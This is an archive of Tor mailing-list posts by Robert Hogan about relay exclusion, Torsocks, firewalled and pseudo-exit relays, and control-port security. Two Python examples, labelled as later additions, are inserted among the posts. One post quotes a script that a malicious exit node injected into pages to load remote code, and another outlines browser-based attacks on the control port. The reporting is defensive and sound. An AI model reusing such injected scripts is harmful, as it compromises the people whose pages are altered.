Re: Scroogle and Tor

2011-02-15 Thread Robert Hogan
On Tuesday 15 February 2011 05:20:21 Mike Perry wrote:
 
 I was under the impression that we hacked it to also be memory-only,
 though. But you're right, if I toggle Torbutton to clear my cache,
 Polipo's is still there...

The polipo shipped in the tor bundles has the cache turned off, but any 
non-Windows users will tend to use the polipo shipped by their distro - 
with caching turned on.



Re: ExcludeNodes doesn't work right

2009-05-01 Thread Robert Hogan
On Thursday 30 April 2009 08:15:02 Scott Bennett wrote:
  About a day ago, I added a list of obsolete nodes, mostly running
 0.1.*.* releases, to my ExcludeNodes list in torrc.  One of those was
 TSL.  I still see TSL being chosen for routes for circuits.  I've
 noticed such apparent violations and commented upon them previously
 here.
  What I don't yet know is whether I might be misunderstanding what
 ExcludeNodes is supposed to do, based upon my understanding of the tor
 man page, which says,

 ExcludeNodes node,node,...
A  list  of  identity fingerprints, nicknames, country codes and
address patterns of nodes to never use when building a  circuit.
(Example:  ExcludeNodes SlowServer, $ABCDEFFF, {cc},
255.254.0.0/8)

 It seems to me that as soon as I send tor a SIGHUP after adding a node
 to ExcludeNodes in torrc, tor ought to begin excluding it from future
 path selections and ought also to remove it from its list of chosen
 entry guards if it is in that list.  If my understanding of what
 ExcludeNodes is supposed to do is incorrect, I'd very much appreciate
 someone letting me know and also some advice as to how to accomplish
 real, immediate exclusion of the node from any new circuits established
 by the client side of tor.

ExcludeNodes isn't respected by tor when building circuits for 'internal' 
use, e.g. directory updates. If you can confirm that the nodes are being 
chosen for circuits that are for the user's use then that would indicate a 
problem.

I think the best way of tracking it would be to do:

telnet localhost 9051
authenticate
setevents extended circ stream
setconf excludenodes={your exclude nodes}

then watch/log the output. If you see 'purpose=general' against a stream on 
a circuit containing an excluded route created after you set the 
excludenodes then there may be a problem worth investigating. You could 
post the suspect output here.




  Thanks for any information on this matter.


   Scott Bennett, Comm. ASMELG, CFIAG
 **
 * Internet:   bennett at cs.niu.edu  *
 **
 * A well regulated and disciplined militia, is at all times a good  *
 * objection to the introduction of that bane of all free governments *
 * -- a standing army.   *
 *-- Gov. John Hancock, New York Journal, 28 January 1790 *
 **




signature.asc
Description: This is a digitally signed message part.
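
The control-port check suggested in the reply above can be automated. The
following is an added example, not part of the original thread or of Tor: it
scans logged CIRC and STREAM events and reports streams attached to
PURPOSE=GENERAL circuits that contain an excluded relay. The event lines are
constructed samples, the function names are hypothetical, and it assumes that
logging began after ExcludeNodes was set and that exclusions are given as
nicknames or fingerprints (not country codes or address patterns).

```python
import re


def fp(ch):
    """Constructed 40-hex-digit fingerprint for the sample data."""
    return "$" + ch * 40


# Constructed control-port output (not captured from a real Tor instance).
SAMPLE_EVENTS = [
    # Circuit 9 has no LAUNCHED line: it was built before logging began.
    f"650 CIRC 9 BUILT {fp('A')}~GuardOne,{fp('B')}~MidOne,{fp('C')}~TSL PURPOSE=GENERAL",
    "650 STREAM 40 SUCCEEDED 9 old.example.com:80",
    # Circuit 11 is created during logging and ends at the excluded relay.
    "650 CIRC 11 LAUNCHED PURPOSE=GENERAL",
    f"650 CIRC 11 EXTENDED {fp('A')}~GuardOne PURPOSE=GENERAL",
    f"650 CIRC 11 BUILT {fp('A')}~GuardOne,{fp('B')}~MidOne,{fp('C')}~TSL PURPOSE=GENERAL",
    "650 STREAM 42 NEW 0 www.example.com:80 PURPOSE=USER",
    "650 STREAM 42 SENTCONNECT 11 www.example.com:80",
    "650 STREAM 42 SUCCEEDED 11 www.example.com:80",
    # Circuit 12 is a user circuit without any excluded relay.
    "650 CIRC 12 LAUNCHED PURPOSE=GENERAL",
    f"650 CIRC 12 BUILT {fp('A')}~GuardOne,{fp('D')}~MidTwo,{fp('E')}~ExitTwo PURPOSE=GENERAL",
    "650 STREAM 43 SUCCEEDED 12 www.example.org:443",
    # Circuit 13 contains the excluded relay but is not a GENERAL circuit.
    "650 CIRC 13 LAUNCHED PURPOSE=TESTING",
    f"650 CIRC 13 BUILT {fp('A')}~GuardOne,{fp('C')}~TSL PURPOSE=TESTING",
]

KEYWORD = re.compile(r"^[A-Z_]+=")  # e.g. PURPOSE=..., BUILD_FLAGS=..., REASON=...


def hop_ids(path):
    """Return every nickname and $fingerprint in a circuit path, upper-cased."""
    ids = set()
    for hop in path.split(","):
        ids.update(part.upper() for part in re.split(r"[=~]", hop) if part)
    return ids


def find_violations(lines, excluded):
    """Return (stream_id, circ_id, target, matched_relays) for each stream that
    was attached to a GENERAL circuit, launched during the log, whose path
    contains a relay named in `excluded`."""
    excluded = {e.strip().upper() for e in excluded if e.strip()}
    circuits = {}  # circ id -> {"purpose": str or None, "hops": set}
    reported = set()
    flagged = []
    for line in lines:
        f = line.split()
        if len(f) < 4 or f[0] != "650":
            continue
        if f[1] == "CIRC":
            circ_id, status, rest = f[2], f[3], f[4:]
            if status == "LAUNCHED":
                circuits[circ_id] = {"purpose": None, "hops": set()}
            circ = circuits.get(circ_id)
            if circ is None:
                continue  # circuit predates the log, so it is out of scope
            if status in ("CLOSED", "FAILED"):
                del circuits[circ_id]
                continue
            for tok in rest:
                if tok.startswith("PURPOSE="):
                    circ["purpose"] = tok.split("=", 1)[1]
                elif not KEYWORD.match(tok):
                    circ["hops"] = hop_ids(tok)  # the path token
        elif f[1] == "STREAM" and len(f) >= 6:
            stream_id, circ_id, target = f[2], f[4], f[5]
            circ = circuits.get(circ_id)
            if circ is None or circ["purpose"] != "GENERAL":
                continue
            matched = sorted(circ["hops"] & excluded)
            if matched and (stream_id, circ_id) not in reported:
                reported.add((stream_id, circ_id))
                flagged.append((stream_id, circ_id, target, matched))
    return flagged


if __name__ == "__main__":
    for hit in find_violations(SAMPLE_EVENTS, ["TSL"]):
        print("stream %s on circuit %s to %s uses excluded %s" % hit)
```

Any line it reports is the kind of "suspect output" the reply asks to have posted to the list.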


Re: Tork - all tor versions lead to 0.2.1.7-alpha?

2008-12-08 Thread Robert Hogan
On Monday 08 December 2008 15:19:39 Praedor Atrebates wrote:
 I am wondering if anyone knows why Tork (0.29.2) seeks to download
 tor-0.2.1.7-alpha regardless of whether one asks it to check for the
 latest stable tor instead of the latest experimental tor.  I see
 that the latest STABLE tor release appears to be 0.2.0.32, not
 0.2.1.7-alpha.

 What gives?

 praedor

A bug in the code. Thanks for pointing it out. For future reference you can 
contact me directly with tork bugs/issues or use [EMAIL PROTECTED] 
I know that you've done both before, so just a reminder.




Re: Excludenode not working?

2008-12-07 Thread Robert Hogan
On Sunday 07 December 2008 05:58:02 [EMAIL PROTECTED] wrote:
 Hi,

 In the Vidalia log file:

 Dec 06 05:14:45.484 [Warning] Requested exit node 'Ungoo5zie6raZeitheo'
 is in ExcludeNodes, or ExcludeExitNodes, using anyway.

 How is it possible?

 Thanks

You have specified 'Ungoo5zie6raZeitheo' in your Exclude*Nodes 
configuration, but tor will continue to use such nodes for internal, 
house-keeping activity such as directory fetches. The exclusion only 
applies to circuits you use for your anonymous traffic.




Re: Introducing Torsocks - Transparent socks for Tor

2008-11-20 Thread Robert Hogan
On Tuesday 11 November 2008 23:25:59 slush wrote:
 I found another problem in torsocks bash script. There is missing
 backslash in sed construction around . torsocks off. More in
 googlecode issue http://code.google.com/p/torsocks/issues/detail?id=1


Hi Slush,

This issue is fixed in SVN now. Thanks for pointing it out.




Re: Torsocks on FreeBSD

2008-11-19 Thread Robert Hogan
On Saturday 15 November 2008 20:34:45 you wrote:
 I'm trying to set up Torsocks on FreeBSD. The configure script fails
 with the error libdl is required.

  From googling it looks like libdl is a part of glibc, but glibc isn't
 listed in ports. The FreeBSD mailing list archives mention that libc
 does an equivalent thing, but I don't know how to tell configure to use
 it.

 Sorry for the newbie question, but how do I get Torsocks to work with
 FreeBSD?

 There's a Tsocks port so it shouldn't be too difficult...

OK, I've fixed the libdl issue. Can you try:

svn checkout http://torsocks.googlecode.com/svn/trunk/ torsocks-read-only

and let me know how you get on?

to build do:

make -f Makefile.cvs
./configure
make






Re: Torsocks on FreeBSD

2008-11-16 Thread Robert Hogan
On Saturday 15 November 2008 20:34:45 Adlesshaven wrote:
 I'm trying to set up Torsocks on FreeBSD. The configure script fails
 with the error libdl is required.

  From googling it looks like libdl is a part of glibc, but glibc isn't
 listed in ports. The FreeBSD mailing list archives mention that libc
 does an equivalent thing, but I don't know how to tell configure to use
 it.

 Sorry for the newbie question, but how do I get Torsocks to work with
 FreeBSD?

 There's a Tsocks port so it shouldn't be too difficult...


It's on the TODO list:

* Merge dsocks so we support BSD (http://monkey.org/~dugsong/dsocks/)

Torsocks is linux-only at the moment unfortunately. 




Re: Introducing Torsocks - Transparent socks for Tor

2008-10-28 Thread Robert Hogan
On Monday 27 October 2008 19:04:38 Kyle Williams wrote:
 Very cool.
 How is this different than proxychains?
 It seems like they both do the same thing.


I actually wasn't aware of proxychains, which looks like it was written 
about the same time as tsocks.

You're right that they more or less do the same thing, and they more or 
less do it the same way - by using LD_PRELOAD to hook a program's calls 
for writing to and reading from the network, including DNS.

Apart from the fact that proxychains allows you to chain your traffic 
through multiple proxies I think torsocks does the following 'extra' bits:

- It supports some dns/network calls that proxychains does not, e.g. 
getpeerinfo.
- It blocks primitive UDP calls by the application (to help prevent DNS 
leaks via UDP).
- It supports the use of hidden services.

I haven't looked at proxychains very closely and I have to confess I 
haven't even used it, but I *think* that is about it.


 On Sun, Oct 26, 2008 at 6:13 AM, Robert Hogan [EMAIL PROTECTED] wrote:
  Linux users may be familiar with the various patches for tsocks that
  make it
  safe for use with Tor.
 
   https://wiki.torproject.org/noreply/TheOnionRouter/TSocksPatches
 
  Torsocks takes all of the patches to tsocks listed at the link above:
 
   http://code.google.com/p/torsocks/source/browse/trunk#trunk/patches
 
  applies some other enhancements:
 
   http://code.google.com/p/torsocks/source/browse/trunk/ChangeLog
 
  and incorporates them into a new project:
 
   http://code.google.com/p/torsocks/
 
  Torsocks allows you to use most socks-friendly applications in a safe
  way with
  Tor. Once you have installed torsocks, just launch it like so:
 
   usewithtor [application]
 
  So, for example you can use ssh to a some.ssh.com by doing:
 
   usewithtor ssh [EMAIL PROTECTED]
 
  or launch pidgin by doing:
 
   usewithtor pidgin
 
  You can download the current build at:
 
   http://torsocks.googlecode.com/files/torsocks-1.0-beta.tar.gz
 
  Torsocks is released under the GNU GPL licence v2. As far as I can
  make out this is compatible with the original tsocks and all
  subsequent patches.






Introducing Torsocks - Transparent socks for Tor

2008-10-26 Thread Robert Hogan
Linux users may be familiar with the various patches for tsocks that make it 
safe for use with Tor.

 https://wiki.torproject.org/noreply/TheOnionRouter/TSocksPatches

Torsocks takes all of the patches to tsocks listed at the link above: 

 http://code.google.com/p/torsocks/source/browse/trunk#trunk/patches

applies some other enhancements:

 http://code.google.com/p/torsocks/source/browse/trunk/ChangeLog 

and incorporates them into a new project:

  http://code.google.com/p/torsocks/

Torsocks allows you to use most socks-friendly applications in a safe way with 
Tor. Once you have installed torsocks, just launch it like so: 

  usewithtor [application] 

So, for example you can use ssh to a some.ssh.com by doing: 

  usewithtor ssh [EMAIL PROTECTED] 

or launch pidgin by doing: 

  usewithtor pidgin

You can download the current build at:

 http://torsocks.googlecode.com/files/torsocks-1.0-beta.tar.gz

Torsocks is released under the GNU GPL licence v2. As far as I can make out 
this is compatible with the original tsocks and all subsequent patches.




Re: Firewalled relays

2008-10-04 Thread Robert Hogan
On Saturday 04 October 2008 00:03:10 Martin Fick wrote:
[..]
 To achieve this, firewalled relays would borrow an idea from hidden
 services and register rendezvous points with the directory servers.  The
 rendezvous points would have to be with non-firewalled relays.  Unlike
 hidden services though, these rendezvous points need not be 3 hops into the
 cloud, they need only be single hops.  Upon startup, a firewalled relay
 would initiate and establish a connection to at least one non-firewalled
 relay and register that connection as a rendezvous point.


On a pedantic note, I think you're referring to introduction points rather than 
rendezvous points here.

 The rendezvous points would only be used to tell firewalled relays that
 another relay or a client wanted to relay through the firewalled relay. 
 Anyone wishing to establish a connection with a firewalled relay would
 contact them through the tor network as a client would making 3 hops before
 hitting the rendezvous point (this contact would be as anonymous as any
 other tor usage).

 Once a client or non-firewalled relay contacts a firewalled relay through
 the rendezvous point indicating its desire to relay through it, the
 firewalled relay will initiate a connection back to the relay or client
 asking to relay though it.  From there on out the firewalled relay would
 behave as a regular relay.


This means the client/router at the other end of the connection with the 
firewalled relay cannot be firewalled themselves. So firewalled relays can 
only act as middlemen and exit nodes under this design, or the client must 
have an open port the firewalled relay can connect to (which is probably not a 
safe assumption for a client).

This limitation has a number of anonymity implications, similar to the ones 
described in this proposal:

https://svn.torproject.org/cgi-bin/viewcvs.cgi/tor/trunk/doc/spec/proposals/133-unreachable-ors.txt?rev=15292&view=markup

The use of intro points seems like a very good idea on the face of it, and is 
probably better than the above proposal since it opens the firewalled relay to 
the entire network rather than just a segment of it.

A few questions:

1. Should the identity of the firewalled relay and the router requesting access 
to it be concealed from the intro point?
2. How should the intro points for a firewalled relay be advertised?
3. Clients can't choose more than one firewalled relay in a circuit. What 
problems might this introduce?

I'm sure there are more. Maybe the Tor developers can think of a show-stopper 
but you probably won't find it out unless you write up a proposal which goes 
into the idea in more detail and raises and addresses some of the problems it 
might create.


 With this design, any traffic using the firewalled relay would undergo a
 normal 3 hop path through the tor network just like other normal tor
 traffic.  The rendezvous points would only be used to communicate desired
 connections but not to carry traffic.  Setup time for connections would
 increase, but throughput should be unaffected.

 Thoughts?

 -Martin




Re: tortila as a bad exit

2008-08-12 Thread Robert Hogan
On Tuesday 12 August 2008 10:09:13 Drake Wilson wrote:
 Quoth Scott Bennett [EMAIL PROTECTED], on 2008-08-11 23:30:20 -0500:
   I'm not convinced.  It hasn't taken any 300 circuits for me.  It
  seems to happen every time I have a circuit that exits via tortila.  It
  happens with every destination web page.

 I can confirm this.  I can't seem to find much pattern to it, though.


I did a simple wget test (no privoxy) and found fairly consistent insertions of 
adsense spam to stevepavlima.com regardless of the site I targeted (google.*, 
guardian.co.uk, irishtimes.com, cnn.com).

script type=text/javascriptvar 
externalscript=http://pagead2.googlesyndication.stevepavlima.com/show_ads.js;; 
document.write('script type=text/javascript src='+externalscript+'?'+new 
Date() * 1+'\/script');/script

I found that using a regular browser the corruption appears infrequent 
(caching, browsers doing their best to make sense of garbage), but the 
corruption is consistent using wget. Where there was no insertion of 
stevepavlima.com (which was rare) I just saw simple truncation.

Can anyone else confirm this?





Re: tortila as a bad exit

2008-08-12 Thread Robert Hogan
On Tuesday 12 August 2008 11:29:56 Robert Hogan wrote:
 On Tuesday 12 August 2008 10:09:13 Drake Wilson wrote:
  Quoth Scott Bennett [EMAIL PROTECTED], on 2008-08-11 23:30:20 -0500:
I'm not convinced.  It hasn't taken any 300 circuits for me.  It
   seems to happen every time I have a circuit that exits via tortila.  It
   happens with every destination web page.
 
  I can confirm this.  I can't seem to find much pattern to it, though.

 I did a simple wget test (no privoxy) and found fairly consistent
 insertions of adsense spam to stevepavlima.com regardless of the site I
 targeted (google.*, guardian.co.uk, irishtimes.com, cnn.com).

 script type=text/javascriptvar
 externalscript=http://pagead2.googlesyndication.stevepavlima.com/show_ads.
js; document.write('script type=text/javascript
 src='+externalscript+'?'+new Date() * 1+'\/script');/script

 I found that using a regular browser the corruption appears infrequent
 (caching, browsers doing their best to make sense of garbage), but the
 corruption is consistent using wget. Where there was no insertion of
 stevepavlima.com (which was rare) I just saw simple truncation.

 Can anyone else confirm this?

Ah, I see KT also found this in an earlier thread. 

http://archives.seul.org/or/talk/Aug-2008/msg00054.html





Re: email hidden service

2008-07-14 Thread Robert Hogan
On Monday 14 July 2008 11:07:16 Dawney Smith wrote:
 Karsten N. wrote:
  Are there any hidden service email services in existance?
 
  Yes:
 
 http://w6kb72k2phin5grc.onion/  (Onion Boxes, Etc)
 http://shells3nfdn3zk5h.onion/  (shells.onion)

 Thanks for the information. Out of interest, how did shells.onion manage
 to get a .onion address that starts shells ? That can't just be a
 coincidence surely?

shallot: http://hangman5naigg7rr.onion/

which is unfortunately down for maintenance at the moment. And the tarball 
appears unavailable elsewhere. I can send you a copy if you're curious though. 
Just mail me directly.




Re: OnionCat -- An IP-Transparent TOR Hidden Service Connector

2008-06-24 Thread Robert Hogan
On Tuesday 24 June 2008 21:01:27 Bernhard Fischer wrote:
 On Tuesday 24 June 2008, M. Peterson wrote:
  Hiho,, cool codings,
  does that mean, emule and torrent can run over tor now?

 Yes, with some limitations. OnionCat (currently) does not route packets.
 You can not forward packets to arbitrary destinations to onioncat, only
 those with destinations which are associated a hidden service. It is a
 hidden service connector and not an anonymizing network layer
 (currently).

 That means that people running TOR and OnionCat can share data with
 torrent/donkey/... together, anonymously, on top of OnionCat but you can
 not just mix it with some legacy Internet-Users.

  Was that not something, that was not desired?

 Not desired by who?


File-sharing on the current Tor network is frowned upon because it conflicts 
with the presumed motivations of many of the volunteers who operate servers.

That said, there is nothing stopping anyone else from creating their own 
parallel Tor network and distributing a tor bundle hardcoded with authority 
information for that network. (I know you know all this but bear with me.)

So it would be easy to imagine a software bundle that comprises:

1. A modified Tor distribution for use on the file-sharing network.
2. Onioncat
3. A torrent distribution pre-configured with the ipv6 IP of the hidden service 
created during installation.

This would then be the software client of a hidden-service/onioncat based 
sharing network. I'm sure many people would be interested in that, though I'm 
not sure performance would scale with the user base.

I've often wondered why such a parallel network doesn't already exist, even 
without the advent of onioncat.

  How may Outproxies are then needed by the tor network?

 Sorry, don't know.


 Bernhard






Re: How are hackers breaking Tor and trojan users?

2008-06-11 Thread Robert Hogan
On Wednesday 11 June 2008 06:17:38 Roger Dingledine wrote:
snip

 He may also be referring to attacks where a local application (like the
 browser, but it doesn't have to be) can be tricked into connecting to
 your local Tor control port, like Kyle's attack from last year:
 http://archives.seul.org/or/announce/Sep-2007/msg0.html
 This was a great attack, but I think the latest versions of Torbutton
 and Vidalia make it a non-issue going forward. I would love to hear if
 you think otherwise.


On a default Tor installation from source, i.e. with no authentication 
mechanism enabled, it is still possible successfully to send commands to the 
controlport if the 'authenticate' command is not preceded by any garbage.

If someone were to develop a browser-based exploit that managed to get 
the 'authenticate', with no preceding bytes, to the controlport then they're 
in. I believe this is extremely difficult to do, and if such an attack was the 
subject of arrakis' and kyle's paper they would have much bigger fish to fry 
than just Tor.

One way of preventing such an attack, however unlikely, would be to mandate a 
conversation such as:

[EMAIL PROTECTED]:~$ telnet localhost 9051
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Challenge is: 0a5f37d2edd284cb
0a5f37d2edd284cb
250 OK
authenticate
250 OK

In the above sequence the controller has had to inspect the challenge and 
parrot it back in order to be allowed to issue an authenticate command.

As far as I'm aware this would defeat a html-form based attack of the sort 
released last year, since such attacks cannot process feedback from the port 
they're attacking. 



signature.asc
Description: This is a digitally signed message part.
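
A model of the challenge-echo conversation proposed above, as an added example
that is not from the original message and is not how Tor's control port
behaves: the connection accepts 'authenticate' only after the peer has
parroted back the challenge from the greeting, so a sender that cannot read
replies never gets a command accepted. The class and function names are
hypothetical and the client lines are constructed.

```python
import hmac
import secrets


class ChallengeGate:
    """Hypothetical per-connection state machine for the proposed exchange.

    CHALLENGE -> READY -> AUTHED, or CLOSED on the first unexpected line.
    """

    def __init__(self):
        # 8 random bytes as 16 hex digits, the same shape as the sample above.
        self.challenge = secrets.token_hex(8)
        self.state = "CHALLENGE"
        self.accepted = []  # commands that got past the gate and 'authenticate'

    def greeting(self):
        """First line the server sends on every new connection."""
        return "Challenge is: " + self.challenge

    def feed(self, line):
        """Process one received line. Returns the reply, or None once the
        connection has been dropped."""
        line = line.rstrip("\r\n")
        if self.state == "CLOSED":
            return None
        if self.state == "CHALLENGE":
            # The very first line must be the challenge, byte for byte.
            ok = hmac.compare_digest(line.encode(), self.challenge.encode())
            self.state = "READY" if ok else "CLOSED"
            return "250 OK" if ok else None
        if self.state == "READY":
            # No authentication mechanism is configured in this model, as in
            # the default source install described in the message.
            if line.strip().lower() == "authenticate":
                self.state = "AUTHED"
                return "250 OK"
            self.state = "CLOSED"
            return None
        # AUTHED: a real controller would execute the command here.
        self.accepted.append(line)
        return "250 OK"


def blind_sender(gate, lines):
    """A peer that cannot read what the port sends back (the HTML-form case):
    it writes its lines without ever seeing the greeting."""
    gate.greeting()  # sent by the server, never seen by this sender
    return [gate.feed(line) for line in lines]


def reading_controller(gate, commands):
    """A normal controller: reads the greeting, echoes the challenge, then
    authenticates and issues its commands."""
    challenge = gate.greeting().split(": ", 1)[1]
    replies = [gate.feed(challenge), gate.feed("authenticate")]
    replies += [gate.feed(cmd) for cmd in commands]
    return replies


if __name__ == "__main__":
    g = ChallengeGate()
    print("blind, clean first line:", blind_sender(g, ["authenticate", "getinfo version"]))
    g = ChallengeGate()
    print("blind, with leading bytes:", blind_sender(g, ["POST / HTTP/1.1", "authenticate"]))
    g = ChallengeGate()
    print("reading controller:", reading_controller(g, ["getinfo version"]), g.accepted)
```

Because the challenge is fresh per connection, a value observed on one connection is rejected on the next.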


Re: Aw: Re: Problem w/ Using tor(k) for Geostreaming Live-Videos

2008-06-11 Thread Robert Hogan
On Wednesday 11 June 2008 21:16:00 [EMAIL PROTECTED] wrote:
 Sorry, MY mistake: This is the live stream url:
 http://wgeostreaming.zdf.de/encoder/livestream15_h.asx It also got a
 Dsl2000 on www.zdf.de there 2! the first one is one of their videos and
 they are not geostream protected! But when you use tork with it do you see
 while it is being streamed that it is going thru tor or just the initial
 request! Am I right that when it is fully going thru tor one must
 constantly see the yellow pop-up video that tor is in usage.. In my case it
 seems to start with tor but then goes for the video straight there... Hence
 it does not work with the life video!

 Do not the browser also pass on the very url to the extern program like
 mplayer, hence to tor issue ???


Hi Erich,

[EMAIL PROTECTED]:~$ lynx -dump 
http://wgeostreaming.zdf.de/encoder/livestream15_h.asx
ASX version = 3.0
Entry
Ref href 
= 
rtsp://c36000-ls.w.core.cdn.streamfarm.net/2R38HDlo3/36000zdf/live/3546zdf/encoder.geozdf.geoevent_h.wmv
 /
/Entry
/ASX

[EMAIL PROTECTED]:~$ torify mplayer -playlist 
rtsp://c36000-ls.w.core.cdn.streamfarm.net/2R38HDlo3/36000zdf/live/3546zdf/encoder.geozdf.geoevent_h.wmv


Or you can click on the 'Anonymous Telnet Session' entry in the 'Anonymize' 
window and run the last command there.

The last command failed for me because:

rtsp://c36000-ls.w.core.cdn.streamfarm.net/2R38HDlo3/36000zdf/live/3546zdf/encoder.geozdf.geoevent_h.wmv.
Not a Realmedia rtsp url. Trying standard rtsp protocol.
RTSP support requires the LIVE.COM Streaming Media libraries!

which I assume won't be a problem for you.

Robert

 @Alex: THX 4 the score, but wished I could see it also NOW!


 - Original Message 
 From: Alexander W. Janssen [EMAIL PROTECTED]
 To:  or-talk@freehaven.net, [EMAIL PROTECTED]
 Date:   11.06.2008 22:02
 Subject: Re: Problem w/ Using tor(k) for Geostreaming Live-Videos

  Works here with torify, though painfully slow. You might chose a stream
  which uses less bandwidth:
 
  $ ./torify mplayer -playlist
  http://wstreaming.zdf.de/zdf/veryhigh/080609_smm.asx
  ...
  STREAM_ASF, URL:
  mms://c36000-o.w.core.cdn.streamfarm.net/36000zdf/ondemand/3546zdf/zdf/zd
 f/0 8/06/080609_smm_vh.wmv
  Resolving c36000-o.w.core.cdn.streamfarm.net for AF_INET...
  Connecting to server c36000-o.w.core.cdn.streamfarm.net[217.243.250.24]:
  1755...
  Connected
  ...
 
  By the way, Switzerland-Turkey 1:1 :-)
 
  Have fun,
  Alex.
 
  [EMAIL PROTECTED] wrote:
   Hi there,
  
   here offers German Tv a live stream for soccer matches of the euro
   2008!
  
   It is shielded by geostreaming! And even more, since due to some
   technical stuff on their side, not all German IPs are allowed
 
  accidentally..
 
   Thus I need to use tor in order to become another German IP via an exit
 
  node, so that I can also watch them in real time!
 
   mplayer -playlist
 
  http_proxy://127.0.0.1:8118/http://wstreaming.zdf.de/zdf/veryhigh/080609_
 smm .asx
 
   It seems that tor is checking out the url in the playlist file but
   then
 
  goes there straight without the proxy? I have tried also regular German
 
   public proxies like http://www.publicproxyservers.com/page1.html but no
 
  success either.. It is an rtsp stream after all, the live video...
 
   How can I run tor(k) so that I can view the games???
  
   Erich
  
   PS: Please reply to the list and to my email address so that I can read
 
  the replies before the daily digest with the others topics of this list..
 






Re: Torbutton 1.2.0rc1 released

2008-06-08 Thread Robert Hogan
On Wednesday 04 June 2008 19:52:15 Curious Kid wrote:
 Thank you so much!

 Have you thought about having an option to set the initial starting state of
 TorButton? Mine starts in the state it was in when I last exited Firefox. That
 has led to me browsing to hidden services in the clear without initially
 realizing that Tor was not enabled. I am thinking that a radio button to
 select from Default (Starts in previous state), Starts Enabled, and Starts
 Disabled.


I second this feature request! A command line argument would be ideal..




Re: Spoofing location - possible?

2008-05-06 Thread Robert Hogan
On Tuesday 06 May 2008 13:40:34 Geoffrey Goodell wrote:
 On Tue, May 06, 2008 at 07:04:38AM -0400, [EMAIL PROTECTED] wrote:
   Jamie McCarthy [EMAIL PROTECTED] said on May 05, 2008 12:38 -0400 (in
 
  part):
  Please forgive me for not doing more thorough research before
  emailing. I'm not part of the Tor community and not really
  interested in getting too into it. I'm just looking for some quick
  advice.
 
  I've done even less research than Jamie had for his question and I think
  have less technical background than he but ...
 
  I came to TOR looking not so much for the ability to surf anonymously
  but to convince my end target that I'm from a particular country.
  Primarily to allow use of streaming media (radio and video) from sites
  that restrict access to those from the United States.

 What you are looking for is a Perspective Access Network -- an overlay
 network that allows you to choose the perspective from which you want to
 access Internet services.

 Tor allows controllers such as Vidalia to determine exactly how circuits
 are built and which TCP streams are attached.  However, to our knowledge
 nothing that gives you what you want in a useful way actually exists at
 this point.

 Fortunately, there is a project in the Vidalia project pipeline to build
 perspective choices (such as choosing the country in which you want your
 exit node to reside).  Matt Edman and Camilo Viecco know more about
 this.

 Geoff

Not strictly true, TorK provides exactly this option under the 'Citizen Of..' 
toolbar button.

The snag is that TorK is linux-only at this point.




Re: getting more exit nodes

2008-04-28 Thread Robert Hogan
On Sunday 27 April 2008 21:57:34 F. Fox wrote:
 Alexander Bernauer wrote:
  On Wed, Apr 23, 2008 at 07:51:51AM -0700, Martin Fick wrote:
  I really don't understand why pseudo-exit node
  anonymity is so important?
 
  The short answer:
  Admins who run a Tor node which is for good reasons not an exit node
  should be able to run at least a pseudo-exit node without additional
  personal risk.

 (snip)

 This is why I've got reject *.* - I feel that the level of risk is just
 too much for me, given the current state of things.

 That being said... I just don't understand this pseudo-exit thing, and
 could really use a clear set of documents (or better yet, something with
 diagrams), so I can get my brain around it.

 Basically:

 1.) How can someone be an exit, without letting arbitrary users take
 on the identity of their IP?

 As soon as someone does that (as is with normal exits), they're open to
 crapstorms from anything bad anyone does... and I just don't understand
 how that can be avoided.

 2.) If a pseudo-exit doesn't loan out its IP, it must be hiding it
 somehow - most likely through another proxy. How on Earth can that be an
 exit?

 Sorry, but I've just been confused from the beginning.

Let's say I'm a client-exit and you're a pseudo-exit. This is how it works:

1. I boot up tor and start using it as a client. I also connect to your 
middleman and tell you that you can send anything you get my way.
2. You advertise yourself as a pseudo-exit in addition to being a middleman.
3. Other Tor clients select their client paths as normal and sometimes select 
your middleman as their exit.
4. When you receive such client traffic you immediately forward it to me.
5. I take it from you and forward the traffic to the real internet, as though 
it's coming from me. I route everything I get back to you.

So this means:

1. I'm not a real exit and neither are you.
2. I'm your only gateway out of the Tor network.
3. Given that the connection between us is encrypted, nothing is leaving your 
box in the clear as it would if you were a real exit.
4. The relationship between the traffic that passes between us and what I pass 
on to the real internet would be fairly trivial to establish.
5. You are definitely not the garbage-in, garbage-out middleman you once were, 
since you can actually see what you're passing on to me. This would be the 
red-light for most confirmed middlemen.
6. I'm not quite sure what I am, and I'm not sure I'd like to be me by default 
- especially since by definition under this scheme I'm a home user who is not 
even a listed tor node. I would not be happy if I was using Tor to post 
anonymously to a forum for a sensitive disease only to find my computer was 
requesting rather more sensitive pictures of ladies' ankles (in Nick's 
immortal phrase) without my knowledge.







Re: getting more exit nodes

2008-04-20 Thread Robert Hogan
On Sunday 20 April 2008 12:32:19 Alexander Bernauer wrote:
 Hi

 The CCC local group Rheintal [1] is currently working on a solution to
 get much more Tor exit nodes which we think is a major problem of Tor.

 The basic idea is to develop a browser plugin which while active turns
 the computer into both a Tor client and a Tor exit node. The target
 group is a Windows XP or Vista user with almost no technical skills but
 fear of pop-ups asking strange things. We are experienced in providing
 and promoting security software to them [2] and we believe that this
 solution will be accepted and widely used.

 To get the software done I would like to discuss the technical aspects
 here.

 The biggest problem we see are those personal firewalls which prevent
 running a normal Tor server. Therefore this machine needs to open a
 client connection. That's why we call it a client-exit node.

 So we need some servers for the client-exit nodes. This nodes we call
 pseudo-exit nodes. The reason for this is that Alice selects this node
 as exit node for its circuit but the traffic gets routed to the
 client-exit node. So the pseudo-exit node doesn't appear in the server
 logs.


This is an interesting idea - I submitted a proposal with broadly similar aims 
a little while ago. Though the approach was completely different.

I suggest you write the idea up using the proposal format and post it to 
or-dev. That process will help you consider the security/anonymity 
implications of what you're suggesting. It will also reveal if there are any 
tricky implementation issues that need working out.

A couple that occur to me:

- Client traffic is being routed through an exit node that was not explicitly 
chosen by the client. Does this have any unintended consequences for anonymity?

- Should pseudo-exits mark themselves as vanilla exits, or as something else?

- What exit policy should they advertise?

- How do the client-exits authenticate themselves to the pseudo-exit? Do they 
upload descriptors to the authorities?



 This means that every Tor node can become a pseudo-exit node without any
 additional law enforcement risks. Given that all Tor nodes are
 pseudo-exit nodes a client-exit node would select a Tor node at random
 and connect to it. As soon as a pseudo-exit node has at least one
 connection to a client-exit node it registers itself at the directory
 server as a normal exit node. From now on everything goes the normal way
 except that the pseudo exit nodes passes the traffic which would
 normally go out of the Tor network to the client-exit node.

 This is the basic idea. I'm sure there are technical aspects we missed
 or assumptions which are wrong. So I would appreciate if you could point
 us on them.

 We tried hard to find a solution which would not require patching
